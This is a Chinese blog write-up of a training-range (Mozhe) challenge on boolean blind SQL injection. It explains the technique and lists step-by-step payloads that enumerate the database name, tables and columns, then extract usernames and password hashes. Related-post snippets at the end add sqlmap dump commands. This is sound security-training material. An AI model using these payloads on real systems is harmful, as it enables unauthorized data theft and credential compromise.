SQL注入漏洞测试(布尔盲注)

最新推荐文章于 2024-04-27 08:57:53 发布
最新推荐文章于 2024-04-27 08:57:53 发布
阅读量267 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59436465/article/details/131110266
版权

一.背景介绍

一位热心的网友再次向“墨者”安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。

二.实训目标

1、掌握SQL注入原理;

2、了解MySQL的数据结构;

3、了解布尔盲注相关语句;

三.什么是布尔盲注?

1.

布尔盲注一般适用于页面没有回显字段,并且他不支持联合查询,web页面只返回正确和错误界面。

2.使用length()函数判断查询结果的长度,使用substr()函数截取每一个字符,并测试出所有的的字符长度。

四.解题步骤

1.进入通知界面,使用单引号

通过上面2个界面我们发现在用单引号的时候他页面返回错误

2.使用/1 /0 的方式判断

通过上面的对比/1为真他返回正确的界面,/0为假他返回错误的界面,结合12上面的步骤我们可以判断出注入类型为布尔盲注。

3.我们开始判断数据库的长度,使用and length(database())=? --+

通过上面2个图的比对我们知道数据的长度为10

4.接下来跑数据库名使用语句/if(mid(database(),1,1)='a',1,0)这里建议分开弄一起可能会错的

mid()截取函数,mid(database(),1,1) ='a'截取第一个字符/if (条件表达式,1,2)这个语句正确表达返回1错误返回2

先在网址哪里输入语句/if(mid(database(),1,1)='a',1,0),然后使用burp抓包

下面为添加变量

5. 然后开始爆破

得到数据库名为:stormgroup

6.得到数据库名接下来我们跑表 ,使用if((length((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'))=1),1,0)

得到表的长度为13

使用:

/if((mid((select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'),1,1)='a'),1,0)

表member notice

判断列的长度:

if((length((select group_concat(column_name) from information_schema.columns where table_name='member'))=1),1,0)

得到长度为20

截取列:

/if((mid((select group_concat(column_name) from information_schema.columns where table_name='member'),1,1)='a'),1,0)

得到列的值:name password sattus

使用

/if((mid((select group_concat(name) from member),1,1)='a'),1,0)

得到账户名:mozhe mozhe

/if((mid((select group_concat(password) from member),1,1)='a'),1,0)

得到密码:3114b433dece9180717f2b7de56b28a3

67b5a98202885b2b38991003928e94f9

跑状态知道第二个密码有用

登录

什么都不说开摆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入-布尔盲注
qq_65240014的博客
07-26 572
关于sql注入的略微进阶一点的文章,介绍关于bool型盲注的方法
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 397
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
SQL Injection (Blind)之盲注(原理、分类、利用)
最新发布
Innocence_0的博客
04-27 1314
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔盲注(Boolean based)基于时间的盲注(Time based)
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 401
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
SQL注入(四):盲注布尔)+盲注(时间)+宽字节+load_file
NSQ0207的博客
07-19 242
盲注布尔+时间 宽字节:使用%df load_file使用
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
SQL注入漏洞演示源代码
07-02
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理以及如何预防它。 SQL注入是一种利用不安全的...
自己动手编写SQL注入漏洞扫描工具
02-16
SQL注入漏洞扫描工具】是一种用于检测Web应用程序是否存在SQL注入漏洞的工具。SQL注入是网络安全领域中的一个重要问题,攻击者可以通过这种技术输入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
墨者学院-SQL注入漏洞测试(布尔盲注)
JimWu的博客
09-04 2680
SQL注入漏洞测试(布尔盲注) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器、kali 1.打开靶场,寻找注入点。 点击公告/new_list.php?id=1,找到注入点。 2.输入id=1’ and 1=1,返回空页面 输入id=1 and 1=1,返回正常页面。 3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证...
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4297
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
一篇文章带你搞定SQL注入闭合方式判断(无回显)
csjjjd的博客
12-08 709
前面已经判断出单引号是一个闭合符了,接下来就大胆加入括号),再进行判断,发现还是不行,那就再加一个括号,之后用法则判断,直接搞定,so easy!基础就不讲了,详情可以看我写的《一篇文章带你搞定SQL注入闭合方式的判断(有报错回显)》在后面加上--+,接下来如果出现真页面而不是报错,那么你的闭合方式给一定正确。这里首先先让它报错,双引号是不行的,用单引号,可以判断单引号是一个闭合符。接下来说一个如何判断自己是对的的判断法则。
sql注入盲注
2302_79119987的博客
04-23 1633
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7204
SQL注入-无回显】
sql布尔盲注
2203_75336412的博客
08-12 226
id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100--+页面返回有数据。id=1' and (ascii(substr(( select id users limit 0,1),1,1)))>30--+页面返回有数据。id=1' and 1=1 --+ 页面有返回?通过这个方法判断出整个数据库名。
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2136
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
burpsuite sql注入漏洞测试(布尔盲注)
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp Suite:首先,确保已正确配置Burp Suite以拦截和修改HTTP请求和响应。您可以在Burp Suite的Proxy选项卡下设置代理,并根据需要配置浏览器或应用程序以使用该代理。 2. 找到注入点:使用Burp Suite的Spider或Repeater工具来找到潜在的注入点。这可以是URL参数、表单字段或Cookie值等。 3. 构造注入语句:使用布尔盲注技术,构造适当的注入语句来测试漏洞。例如,您可以尝试通过在WHERE子句中使用布尔逻辑来判断条件是否为真或假来确定数据库中的信息。 4. 检测响应差异:发送经过注入处理的请求,并观察响应是否有所不同。如果响应正常,可能意味着注入失败;如果响应出现错误或有其他差异,可能意味着注入成功。 5. 使用布尔逻辑验证条件:根据不同的响应,使用布尔逻辑来验证条件是否为真或假。例如,您可以通过在注入语句中使用AND或OR运算符来检查条件。 6. 执行进一步的测试:根据验证的结果,您可以进一步探测和利用漏洞。使用Burp Suite的其他工具和插件来自动化和加快测试过程。 请注意,在进行任何安全测试之前,确保您已获得适当的授权,并仅在合法范围内进行测试。此外,始终遵循道德黑客和安全测试的最佳实践。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值